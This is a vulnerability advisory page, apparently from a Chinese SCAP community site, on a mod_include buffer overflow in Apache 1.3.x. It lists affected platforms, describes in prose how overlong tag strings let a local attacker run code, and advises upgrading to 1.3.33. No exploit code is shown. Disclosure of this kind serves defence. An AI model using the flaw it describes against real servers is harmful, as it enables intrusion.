+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SGI IRIX 6.5.9
- SGI IRIX 6.5.8
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Apache 1.3.18
Apache Software Foundation Apache 1.3.17
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ OpenBSD OpenBSD 2.8
+ S.u.S.E. Linux 7.1
Apache Software Foundation Apache 1.3.14
+ EnGarde Secure Linux 1.0.1
- MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ SGI IRIX 6.5.11
+ SGI IRIX 6.5.10
+ SGI IRIX 6.5.9
+ SGI IRIX 6.5.8
+ SGI IRIX 6.5.7
+ SGI IRIX 6.5.6
+ SGI IRIX 6.5.5
+ SGI IRIX 6.5.4
+ SGI IRIX 6.5.3
+ SGI IRIX 6.5.2
+ SGI IRIX 6.5.1
+ SGI IRIX 6.5
Apache Software Foundation Apache 1.3.12
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ OpenBSD OpenBSD 2.8
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0
+ Sun Cobalt ManageRaQ v2 3599BD
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
Apache Software Foundation Apache 1.3.11
Apache Software Foundation Apache 1.3.9
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ Sun Solaris 8_x86
+ Sun Solaris 8_sparc
+ Sun SunOS 5.8 _x86
+ Sun SunOS 5.8
Apache Software Foundation Apache 1.3.7 -dev
Apache Software Foundation Apache 1.3.6
+ Sun Cobalt ManageRaQ3 3000R-mr
+ Sun Cobalt RaQ3 3000R
+ Sun Cobalt Velociraptor
Apache Software Foundation Apache 1.3.4
Apache Software Foundation Apache 1.3.3
+ RedHat Linux 5.2 sparc
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 alpha
Apache Software Foundation Apache 1.3.1
Apache Software Foundation Apache 1.3
+ Apple Mac OS X 10.3.2
+ Apple Mac OS X 10.3.1
+ Apple Mac OS X 10.3
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X 10.2.6
+ Apple Mac OS X 10.2.5
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X Server 10.3.2
+ Apple Mac OS X Server 10.3.1
+ Apple Mac OS X Server 10.3
+ Apple Mac OS X Server 10.2.8
+ Apple Mac OS X Server 10.2.7
+ Apple Mac OS X Server 10.2.6
+ Apple Mac OS X Server 10.2.5
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ Apple Mac OS X Server 10.1.5
+ Apple Mac OS X Server 10.1.4
+ Apple Mac OS X Server 10.1.3
+ Apple Mac OS X Server 10.1.2
+ Apple Mac OS X Server 10.1.1
+ Apple Mac OS X Server 10.1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.33
+ Apple Mac OS X 10.3.6
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X Server 10.3.6
+ Apple Mac OS X Server 10.2.8
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1

- 不受影响的程序版本

Apache Software Foundation Apache 1.3.33
+ Apple Mac OS X 10.3.6
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X Server 10.3.6
+ Apple Mac OS X Server 10.2.8
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1

- 漏洞讨论

The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow.

A local attacker may leverage this issue to execute arbitrary code on the affected computer with the privileges of the affected Apache server.

- 漏洞利用

The following exploit has been made available:

- 解决方案

The vendor has released version 1.3.33 to address this issue.

Please see the attached vendor advisories for more information.


Sun Solaris 8_sparc

Sun Solaris 9

Sun Solaris 9_x86

Apache Software Foundation Apache 1.3

Apache Software Foundation Apache 1.3.1

Apache Software Foundation Apache 1.3.11

Apache Software Foundation Apache 1.3.12

Apache Software Foundation Apache 1.3.14

Apache Software Foundation Apache 1.3.17

Apache Software Foundation Apache 1.3.18

Apache Software Foundation Apache 1.3.19

Apache Software Foundation Apache 1.3.20

Apache Software Foundation Apache 1.3.23

Apache Software Foundation Apache 1.3.25

Apache Software Foundation Apache 1.3.26

Apache Software Foundation Apache 1.3.27

Apache Software Foundation Apache 1.3.28

Apache Software Foundation Apache 1.3.29

Apache Software Foundation Apache 1.3.3

Apache Software Foundation Apache 1.3.31

Apache Software Foundation Apache 1.3.6

Apache Software Foundation Apache 1.3.7 -dev

Apache Software Foundation Apache 1.3.9

IBM Hardware Management Console (HMC) for iSeries 3.3.2

IBM Hardware Management Console (HMC) for pSeries 3.3.2

IBM Hardware Management Console (HMC) for iSeries 4.0 R2.0

IBM Hardware Management Console (HMC) for pSeries 4.0 R2.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站